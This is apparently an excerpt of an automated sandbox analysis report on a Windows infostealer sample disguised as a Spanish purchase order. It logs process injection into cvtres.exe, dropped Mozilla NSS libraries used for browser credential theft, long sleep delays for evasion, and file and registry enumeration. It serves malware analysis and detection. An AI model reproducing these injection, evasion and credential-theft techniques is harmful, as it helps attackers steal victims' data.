Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_00408080 push 004080B8h; ret 1_2_004080B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_00408158 push 00408196h; ret 1_2_0040818E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_00408970 push 004089E4h; ret 1_2_004089DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_00408994 push 004089E4h; ret 1_2_004089DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_004089AC push 004089E4h; ret 1_2_004089DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_00415208 push 0041528Ch; ret 1_2_00415284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_0040CA0C push 0040CA3Ch; ret 1_2_0040CA34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_0040CA10 push 0040CA3Ch; ret 1_2_0040CA34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_00417AEC push 00417B18h; ret 1_2_00417B10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_00404BC0 push 00404C11h; ret 1_2_00404C09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_0040D3C0 push 0040D3ECh; ret 1_2_0040D3E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_0040A3E4 push 0040A410h; ret 1_2_0040A408
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_0040C390 push 0040C3C0h; ret 1_2_0040C3B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_0040C394 push 0040C3C0h; ret 1_2_0040C3B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_0040A3AC push 0040A3D8h; ret 1_2_0040A3D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_0040DC44 push 0040DCA3h; ret 1_2_0040DC9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_0040DC0C push 0040DC38h; ret 1_2_0040DC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_0040B41E push 0040B44Ch; ret 1_2_0040B444
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_0040B420 push 0040B44Ch; ret 1_2_0040B444
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_0040A438 push 0040A464h; ret 1_2_0040A45C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_0041A4F4 push 0041A51Ah; ret 1_2_0041A512
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_00414C80 push 00414CACh; ret 1_2_00414CA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_00409488 push 004094B8h; ret 1_2_004094B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_0041A4AC push 0041A4E8h; ret 1_2_0041A4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_00418CB8 push 00418CE8h; ret 1_2_00418CE0
Source: msvcp140.dll.1.dr Static PE information: section name: .didat
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_0040B15C LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_0040B15C
Source: NUEVA ORDEN-MATSA 10-2022,.exe Static PE information: real checksum: 0x30f90 should be: 0x3453f
Source: ucrtbase.dll.1.dr Static PE information: 0x9E3394C7 [Sun Feb 8 16:22:31 2054 UTC]
Source: initial sample Static PE information: section name: .text entropy: 7.625269203895489
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-datetime-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-file-l2-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-console-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\nss3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-heap-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\mozglue.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-libraryloader-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-conio-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\ucrtbase.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\msvcp140.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-string-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-private-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-handle-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-timezone-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-runtime-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-processthreads-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-namedpipe-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-math-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\softokn3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-processthreads-l1-1-1.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-heap-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-sysinfo-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-convert-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-errorhandling-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-synch-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-process-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-stdio-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\freebl3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-filesystem-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-file-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-time-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-profile-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-util-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\vcruntime140.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-rtlsupport-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-environment-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-interlocked-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-locale-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-processenvironment-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-synch-l1-2-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-file-l1-2-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-memory-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-string-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-multibyte-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-debug-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-localization-l1-2-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-utility-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe File created: C:\Users\user\AppData\Local\Temp\1C1DB9BC\nssdbm3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_00417B1A LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 1_2_00417B1A
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe TID: 768 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_00416B94 LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,CreateToolhelp32Snapshot,Process32FirstW,FindCloseChangeNotification,GetCurrentProcessId, 1_2_00416B94
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-errorhandling-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-synch-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-process-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-stdio-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-datetime-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-file-l2-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\freebl3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-console-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-heap-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-filesystem-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-libraryloader-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-conio-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-file-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-time-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-util-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-profile-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-rtlsupport-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-string-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-interlocked-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-environment-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-private-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-locale-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-processenvironment-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-synch-l1-2-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-handle-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-timezone-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-file-l1-2-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-runtime-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-processthreads-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-namedpipe-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-math-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-memory-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-string-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-multibyte-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\softokn3.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-debug-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-sysinfo-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-processthreads-l1-1-1.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-heap-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-utility-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-core-localization-l1-2-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\api-ms-win-crt-convert-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1C1DB9BC\nssdbm3.dll Jump to dropped file
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Registry key enumerated: More than 151 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_00416748 GetSystemInfo, 1_2_00416748
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_004098A0 FindFirstFileW,FindNextFileW,FindClose, 1_2_004098A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_0040D0A0 FindFirstFileW, 1_2_0040D0A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose, 1_2_00414408
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_00408D44 FindFirstFileW,GetFileAttributesW, 1_2_00408D44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_00415610 FindFirstFileW,FindNextFileW,FindClose, 1_2_00415610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_004087DC FreeLibrary,FindFirstFileW,DeleteFileW,FindNextFileW,SetCurrentDirectoryW,RemoveDirectoryW, 1_2_004087DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_0040D06E FindFirstFileW, 1_2_0040D06E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_0041303C FindFirstFileW,FindNextFileW,FindClose, 1_2_0041303C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_0040989F FindFirstFileW,FindNextFileW,FindClose, 1_2_0040989F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_004111C4 FindFirstFileW,FindNextFileW,FindClose, 1_2_004111C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_00412D70 FindFirstFileW,FindNextFileW,FindClose, 1_2_00412D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_00408D3C FindFirstFileW,GetFileAttributesW, 1_2_00408D3C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_0041158C FindFirstFileW,FindNextFileW,FindClose, 1_2_0041158C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_00411590 FindFirstFileW,FindNextFileW,FindClose, 1_2_00411590
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_00412D9C FindFirstFileW,FindNextFileW,FindClose, 1_2_00412D9C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Code function: 1_2_00407A34 mov eax, dword ptr fs:[00000030h] 1_2_00407A34
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 401000 Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 41B000 Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 41D000 Jump to behavior
Source: C:\Users\user\Desktop\NUEVA ORDEN-MATSA 10-2022,.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe base: 41E000
